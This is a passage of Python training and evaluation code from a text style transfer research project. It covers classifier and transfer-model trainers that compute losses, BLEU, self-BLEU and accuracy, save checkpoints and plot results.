self.args.mask_id = self.tokenizer.token2index["[mask]"]
self.model.set_mask_id(self.args.mask_id)
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
acc_record = []
global_step_record_for_eval = []
global_step = -1
pad_id = args.pad_id
model.zero_grad()
if args.freeze_emb_at_beginning:
model.freeze_emb()
start_time = time.time()
for ep in range(args.num_train_epochs):
if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
model.unfreeze_emb()
for step, batch in enumerate(train_dataloader):
global_step += 1
src, lab, src_len = batch
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask)
loss = F.cross_entropy(sorted_outputs, sorted_lab, reduction='mean')
loss.backward()
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(loss.item())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
print("### TRAINING ENDS ###\n")
print("eval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (acc_record, global_step_record_for_eval)
best_acc = self.save_train_result(train_record, eval_record)
return best_acc, train_record, eval_record
def evaluate(self, eval_dataloader=None):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds, total_labs = [], []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
total_labs.extend(lab.numpy().tolist())
# src, lab = src.to(args.device), lab.to(args.device)
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(total_labs, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
return acc
def test(self, test_dataloader=None, test_data=None, save_res=True):
if test_dataloader is not None:
assert test_data is not None
else:
test_dataloader = self.test_dataloader
test_data = self.test_data
test_lab = test_data['lab']
test_src_str = test_data['src_str']
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds = []
# total_labs = []
total_weights = []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(test_dataloader):
src, lab, src_len = batch
# total_labs.extend(lab.numpy().tolist())
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, sorted_weights = model(sorted_src, sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
total_weights.extend(weights.cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(test_lab, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
# print("type(test_src_str) is", type(test_src_str)) # <class 'list'>
# print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'>
# print("type(test_lab) is", type(test_lab)) # <class 'list'>
# print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'>
if save_res:
with open(os.path.join(args.output_dir, "weights.csv"), 'w', newline='') as f:
csv_writer = csv.writer(f)
for ind, sample in enumerate(zip(
test_lab, total_preds, test_src_str, total_weights
)):
lab, pred, src_str, weights = sample
# src_str is a list
csv_writer.writerow([f"#{ind}"] + src_str.strip().split())
csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights])
return acc
def gen_masked_src(self, data_name):
if data_name == "train":
dataloader = self.train_dataloader
data = self.train_data
elif data_name == "dev":
dataloader = self.dev_dataloader
data = self.dev_data
elif data_name == "test":
dataloader = self.test_dataloader
data = self.test_data
test_lab = data['lab']
test_src_str = data['src_str']
args = self.args
model = self.model
tokenizer = self.tokenizer
model.eval()
total_loss = 0
total_preds = []
# total_labs = []
total_weights = []
total_style_src = []
total_content_src = []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(dataloader):
src, lab, src_len = batch
# total_labs.extend(lab.numpy().tolist())
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, sorted_weights, sorted_style_src,\
sorted_content_src = model.get_masked_src(sorted_src,
sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices)
style_src = torch.index_select(sorted_style_src, dim=0, index=resorted_indices)
content_src = torch.index_select(sorted_content_src, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
total_weights.extend(weights.cpu().numpy().tolist())
total_style_src.extend(style_src.cpu().numpy().tolist())
total_content_src.extend(content_src.cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(test_lab, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
# print("type(test_src_str) is", type(test_src_str)) # <class 'list'>
# print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'>
# print("type(test_lab) is", type(test_lab)) # <class 'list'>
# print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'>
total_src_tokens = []
total_style_tokens = []
total_content_tokens = []
with open(os.path.join(args.output_dir, f"{data_name}_weights.csv"), 'w', newline='') as f:
csv_writer = csv.writer(f)
for ind, sample in enumerate(zip(
test_lab, total_preds, test_src_str, total_weights,
total_style_src, total_content_src
)):
lab, pred, src_str, weights, style_src, content_src = sample
# src_str is a list
src_tokens = src_str.strip().split()
csv_writer.writerow([f"#{ind}"] + list(map(lambda x:"'"+x, src_tokens)))
csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights])
content_tokens = tokenizer.index_to_token(content_src, include_sos_eos=False)
style_tokens = tokenizer.index_to_token(style_src, include_sos_eos=False)
total_src_tokens.append(src_tokens[1:-1])
total_style_tokens.append(style_tokens)
total_content_tokens.append(content_tokens)
return total_src_tokens, total_content_tokens, total_style_tokens
```
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/transfer/trainers.py
```python
import os
import time
import csv
import pickle
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
from utils.evaluator import BLEUEvaluator
def get_transfer_data(data_dir, data_name):
"""
args:
data_dir: str
data_name: str
return:
data: dict of {"src_str": list of str, "lab": list of int}
"""
src_0, src_1 = [], []
with open(os.path.join(data_dir, data_name+".0"), 'r') as f:
for line in f.readlines():
src_0.append(line.strip())
with open(os.path.join(data_dir, data_name+".1"), 'r') as f:
for line in f.readlines():
src_1.append(line.strip())
lab_0 = [0] * len(src_0)
lab_1 = [1] * len(src_1)
src = src_0 + src_1
lab = lab_0 + lab_1
assert len(src) == len(lab)
data = {"src_str": src, "lab": lab}
print("%s data has been loaded" % data_name)
for l, count in enumerate(np.bincount(data["lab"])):
print("number of label %d: %d" % (l, count))
return data
def load_and_cache_data(args, data_name, tokenizer):
"""
return:
data: dict of {"src_str": list of str,
"src_ind": list of int,
"lab": list of int}
"""
sos_str = "_sos" if args.use_sos else ""
eos_str = "_eos" if args.use_eos else ""
mask_str = "_mask" if "mask" in args.vocab_file_name else ""
cached_data_file = os.path.join(
args.data_dir,
f"cached_transfer_{data_name}{sos_str}{eos_str}{mask_str}"
)
if os.path.exists(cached_data_file) and not args.overwrite_cache:
print("Loading data from cached data file %s" % cached_data_file)
data = torch.load(cached_data_file)
else:
print("Creating cached data file from data at %s" % cached_data_file)
data = get_transfer_data(args.data_dir, data_name)
index_src = []
str_src = []
sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID
sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN
if args.use_sos and args.use_eos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([sos_token, text, eos_token]))
elif args.use_sos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text))
str_src.append(' '.join([sos_token, text]))
elif args.use_eos:
for text in data['src_str']:
index_src.append(tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([text, eos_token]))
else:
for text in data['src_str']:
index_src.append(tokenizer.encode(text))
str_src.append(text)
data['src_ind'] = index_src
data['src_str'] = str_src
torch.save(data, cached_data_file)
return data
def lambda_schedule(num_iter, start=0.0, stop=1.0, ratio=0.1):
lambdas = np.ones(num_iter) * stop
progress_interval = num_iter * ratio
for i in range(int(progress_interval)):
lambdas[i] *= i / progress_interval
return lambdas
class BasicTrainer:
"""
Basic Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None,
tokenizer=None):
self.args = args
self.model = model
self.optimizer = None
self.scheduler = None
self.train_dataloader = self.get_dataloader(train_data, "train")\
if train_data else None
self.dev_dataloader = self.get_dataloader(dev_data, "dev")\
if dev_data else None
self.test_dataloader = self.get_dataloader(test_data, "test")\
if test_data else None
if self.train_dataloader:
self.optimizer, self.scheduler = self.get_optimizer()
def get_dataloader(self, data, data_name):
args = self.args
if data_name == "train":
shuffle = args.shuffle
batch_size = args.batch_size
else:
shuffle = False
# batch_size = 2
batch_size = args.batch_size
dataset = ClassifierDataset(data["src_ind"], data["lab"])
dataloader = DataLoader(dataset=dataset,
batch_size=args.batch_size,
shuffle=shuffle,
num_workers=args.num_workers,
collate_fn=ClassifierPaddingCollate)
return dataloader
def get_optimizer(self):
args = self.args
model = self.model
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, model.parameters())
num_steps = len(train_dataloader) * args.num_train_epochs
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def save_checkpoint(self, path):
# torch.save(self.args, os.path.join(path, "args.pt"))
torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
# torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
# torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
return
def train(self):
raise NotImplementedError()
def evaluate(self):
raise NotImplementedError()
def test(self):
raise NotImplementedError()
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
eval_bleu_record, eval_gs_record = eval_record
best_bleu = np.max(eval_bleu_record)
step_of_best_bleu = eval_gs_record[np.argmax(eval_bleu_record)]
print("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
f.write("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
plt.figure()
plt.xlabel("step")
plt.ylabel("BLEU")
plt.plot(eval_gs_record, eval_bleu_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu.pdf"), format='pdf') # bbox_inches='tight'
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
return best_bleu, step_of_best_bleu
class TransferModelTrainer(BasicTrainer):
def __init__(self, args, model, train_data=None, dev_data=None,
test_data=None, **kwargs):
super().__init__(
args, model, train_data, dev_data, test_data
)
self.tokenizer = kwargs["tokenizer"]
if self.args.cls_model_path:
print(f"Load classifier model form {self.args.cls_model_path}")
self.model.classifier.load_state_dict(
torch.load(
os.path.join(self.args.cls_model_path, "model_state_dict.pt")
)
)
self.model.freeze_cls()
# args.cls_weight = 0.05
# args.ca_weight = 0.0
# args.bt_weight = 1.0
self.use_caw_schedule = False
del self.optimizer
del self.scheduler
if self.train_dataloader:
params = []
for k, v in self.model.named_parameters():
# print("%s: %s" % (k, str(v.shape)))
if "classifier" in k or "lm" in k:
print("not optimize %s" % k)
else:
print("add params of %s to optimizer" % k)
params.append(v)
self.optimizer, self.scheduler\
= self.get_optimizer(params)
# torch.autograd.set_detect_anomaly(True)
self.clf_model = torch.load(args.cnn_clf_path).to(args.device)
self.clf_model.eval()
self.dev_ref_path_list = getattr(args, "dev_ref_path_list", None)
self.test_ref_path_list = getattr(args, "test_ref_path_list", None)
if self.test_ref_path_list is None:
self.test_ref_path_list = self.args.ref_list
print("self.dev_ref_path_list is")
print(self.dev_ref_path_list)
print("self.test_ref_path_list is")
print(self.test_ref_path_list)
if not self.args.use_bpe:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"test.{i}")] for i in range(2)
]
else:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.test.{i}")] for i in range(2)
]
print("self.dev_data_path_list is")
print(self.dev_data_path_list)
print("self.test_data_path_list is")
print(self.test_data_path_list)
def get_optimizer(self, params=None):
args = self.args
if params is None:
print("return because params is None")
return None, None
# params = self.model.parameters()
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, params)
num_steps = len(train_dataloader) * args.num_train_epochs // args.grad_accum_interval
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
dev_metric_record = []
global_step_record_for_eval = []
global_step = 0
pad_id = args.pad_id
grad_accum_interval = args.grad_accum_interval
log_loss = 0.0
num_iters_per_epoch = len(train_dataloader)
normalizer = min(num_iters_per_epoch, grad_accum_interval)
cls_w = args.cls_weight
print("cls_w is", cls_w)
if self.use_caw_schedule:
start = 0.0
stop = args.ca_weight
ratio = 0.5
ca_w_list = lambda_schedule(args.num_steps,
start=start, stop=stop, ratio=ratio)
print(f"ca_w uses schedule (start={start}, stop={stop}, ratio={ratio})")
ca_w = ca_w_list[0]
else:
ca_w = args.ca_weight
print("ca_w is", ca_w)
bt_w = args.bt_weight
print("bt_w is", bt_w)
model.zero_grad()
if args.freeze_emb_at_beginning:
model.freeze_emb()
start_time = time.time()
for ep in range(args.num_train_epochs):
if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
model.unfreeze_emb()
for step, batch in enumerate(train_dataloader):
src, lab, src_len = batch
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_output_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_output, sorted_output_len = sorted_output_tuple
rec_loss = sorted_rec_loss.mean()
bt_loss = sorted_bt_loss.mean()
src_cls_loss = sorted_src_cls_loss.mean()
soft_out_cls_loss = sorted_soft_out_cls_loss.mean()
out_cls_loss = sorted_out_cls_loss.mean()
ca_loss = sorted_ca_loss.mean()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
loss /= normalizer
loss.backward()
if (step+1) % grad_accum_interval == 0 or\
(grad_accum_interval >= num_iters_per_epoch and
(step+1) == num_iters_per_epoch):
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(log_loss)
# global_step += 1
log_loss = 0.0
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item() * normalizer:.4f} "\
f"rec_loss: {rec_loss.item():.4f} "\
f"bt_loss: {bt_loss.item():.4f} "\
f"src_cls_loss: {src_cls_loss.item():.4f} "\
f"soft_out_cls_loss: {soft_out_cls_loss.item():.4f} "\
f"out_cls_loss: {out_cls_loss.item():.4f} "\
f"ca_loss: {ca_loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"ca_w: {ca_w:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
global_step += 1
if self.use_caw_schedule:
ca_w = ca_w_list[global_step]
else:
log_loss += loss.item()
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
raise e
# gpu_profile(frame=sys._getframe(), event='line', arg=None)
print("### TRAINING ENDS ###\n")
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (dev_metric_record, global_step_record_for_eval)
with open(os.path.join(args.output_dir, "record.pt"), "wb") as f:
pickle.dump({"train": train_record, "eval": eval_record}, f)
self.save_train_result(train_record, eval_record)
return train_record, eval_record
def evaluate(self, eval_dataloader=None, data_path_list=None, ref_path_list=None, data_name="dev"):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
ref_path_list = ref_path_list if ref_path_list else self.dev_ref_path_list
data_path_list = data_path_list if data_path_list else self.dev_data_path_list
args = self.args
model = self.model
tokenizer = self.tokenizer
clf_model = self.clf_model
model.eval()
num_data = 0
total_loss = 0
total_rec_loss = 0
total_bt_loss = 0
total_src_cls_loss = 0
total_soft_out_cls_loss = 0
total_out_cls_loss = 0
total_ca_loss = 0
outputs_list = []
outputs_len_list = []
lab_list = []
clf_preds_list = []
cls_w = args.cls_weight
ca_w = args.ca_weight
bt_w = args.bt_weight
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
num_data += src.shape[0]
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_outputs_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_outputs, sorted_outputs_len = sorted_outputs_tuple
# shape of sorted_outputs is [batch_size, max_len]
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
outputs_len = torch.index_select(sorted_outputs_len, dim=0, index=resorted_indices)
clf_preds = torch.argmax(clf_model(outputs), dim=-1)
rec_loss = sorted_rec_loss.sum()
bt_loss = sorted_bt_loss.sum()
src_cls_loss = sorted_src_cls_loss.sum()
soft_out_cls_loss = sorted_soft_out_cls_loss.sum()
out_cls_loss = sorted_out_cls_loss.sum()
ca_loss = sorted_ca_loss.sum()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
total_rec_loss += rec_loss.item()
total_bt_loss += bt_loss.item()
total_src_cls_loss += src_cls_loss.item()
total_soft_out_cls_loss += soft_out_cls_loss.item()
total_out_cls_loss += out_cls_loss.item()
total_ca_loss += ca_loss.item()
total_loss += loss.item()
outputs_list.extend(
[x.squeeze(0) for x in torch.split(outputs, split_size_or_sections=1, dim=0)]
)
outputs_len_list.extend(
[x.squeeze(0) for x in torch.split(outputs_len, split_size_or_sections=1, dim=0)]
)
lab_list.extend(
[x.squeeze(0) for x in torch.split(lab, split_size_or_sections=1, dim=0)]
)
clf_preds_list.extend(
[x.squeeze(0).item() for x in torch.split(clf_preds, split_size_or_sections=1, dim=0)]
)
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
eval_loss = total_loss / num_data
eval_rec_loss = total_rec_loss / num_data
eval_bt_loss = total_bt_loss / num_data
eval_src_cls_loss = total_src_cls_loss / num_data
eval_soft_out_cls_loss = total_soft_out_cls_loss / num_data
eval_out_cls_loss = total_out_cls_loss / num_data
eval_ca_loss = total_ca_loss / num_data
inv_lab_list = 1-np.array(lab_list)
# print("clf_preds_list is")
# print(clf_preds_list)
eval_acc = accuracy_score(inv_lab_list, np.array(clf_preds_list)) * 100.0
transfer_file_names = [
os.path.join(args.output_dir, f"{data_name}.0.tsf"),
os.path.join(args.output_dir, f"{data_name}.1.tsf")
]
transfer_files = [
open(transfer_file_names[0], 'w'),
open(transfer_file_names[1], 'w')
]
count = 0
# print(f"len(outputs_list): {len(outputs_list)}, len(outputs_len_list): {len(outputs_len_list)}")
for output, output_len, l in zip(outputs_list, outputs_len_list, lab_list):
# print("output is", output)
text = tokenizer.decode(output, include_sos_eos=False)
if output_len < args.max_decoding_len:
pass
if args.use_bpe:
text = text.replace("@@ ", "")
text = text.strip("@@")
transfer_files[l].write(text+'\n')
count += 1
transfer_files[0].close()
transfer_files[1].close()
try:
assert count == num_data
except:
print(f"count: {count}, total_num: {num_data}")
raise RuntimeError()
bleu_evaluator = BLEUEvaluator()
if ref_path_list is not None:
bleu_score_021 = bleu_evaluator.score(ref_path_list[0], transfer_file_names[0])
bleu_score_120 = bleu_evaluator.score(ref_path_list[1], transfer_file_names[1])
bleu_score = (bleu_score_021 + bleu_score_120) / 2
else:
bleu_score = None
if data_path_list is not None:
self_bleu_score_021 = bleu_evaluator.score(data_path_list[0], transfer_file_names[0])
self_bleu_score_120 = bleu_evaluator.score(data_path_list[1], transfer_file_names[1])
self_bleu_score = (self_bleu_score_021 + self_bleu_score_120) / 2
else:
self_bleu_score = None
print("==============================")
if ref_path_list is not None:
print(
f"BLEU: {bleu_score:.4f} "\
f"(0->1:{bleu_score_021:.4f}, 1->0:{bleu_score_120:.4f}) ",
end='',
)
if data_path_list is not None:
print(
f"self-BLEU: {self_bleu_score:.4f} "\
f"(0->1:{self_bleu_score_021:.4f}, 1->0:{self_bleu_score_120:.4f}) ",
end='',
)
print(
f"acc: {eval_acc:.4f}\n"\
f"loss: {eval_loss:.4f} "\
f"rec_loss: {eval_rec_loss:.4f} "\
f"bt_loss: {eval_bt_loss:.4f} "\
f"src_cls_loss: {eval_src_cls_loss:.4f} "\
f"soft_out_cls_loss: {eval_soft_out_cls_loss:.4f} "\
f"out_cls_loss: {eval_out_cls_loss:.4f} "\
f"ca_loss: {eval_ca_loss:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
print("==============================\n")
return (bleu_score, self_bleu_score, eval_acc)
def test(self, test_dataloader=None, data_path_list=None, ref_path_list=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
ref_path_list = ref_path_list if ref_path_list else self.test_ref_path_list
data_path_list = data_path_list if data_path_list else self.test_data_path_list
return self.evaluate(test_dataloader, data_path_list, ref_path_list, "test")
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
dev_metric_record, eval_gs_record = eval_record
dev_unzip = list(zip(*dev_metric_record))
dev_bleu_record, dev_self_bleu_record, dev_acc_record = np.array(dev_unzip[0]),\
np.array(dev_unzip[1]), np.array(dev_unzip[2])
if (dev_bleu_record!=None).all():
best_dev_bleu = np.max(dev_bleu_record)
step_of_best_dev_bleu = eval_gs_record[np.argmax(dev_bleu_record)]
print("best dev BLEU: %.4f in step %d" % (best_dev_bleu, step_of_best_dev_bleu))
fig = plt.figure()
ax_1 = fig.add_subplot(111)
ax_2 = ax_1.twinx()
ax_1.set_xlabel("step")
